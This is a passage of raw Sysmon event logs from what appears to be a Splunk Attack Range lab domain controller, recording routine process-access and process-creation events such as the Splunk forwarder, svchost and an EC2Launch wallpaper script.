13:58:47.382{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce\ctfmon.exe 10341000x800000000000000013385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.288{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9417-6005-1605-00000000A301}7028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.288{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.288{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.288{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.288{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.288{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9417-6005-1605-00000000A301}7028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.288{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9417-6005-1605-00000000A301}7028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.148{59A5CD1D-9417-6005-1605-00000000A301}7028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-9416-6005-1405-00000000A301}69286972C:\Windows\system32\conhost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-9416-6005-1305-00000000A301}69126916C:\Windows\system32\cmd.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.023{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 10341000x800000000000000013369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.007{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.007{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.007{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.007{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.992{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 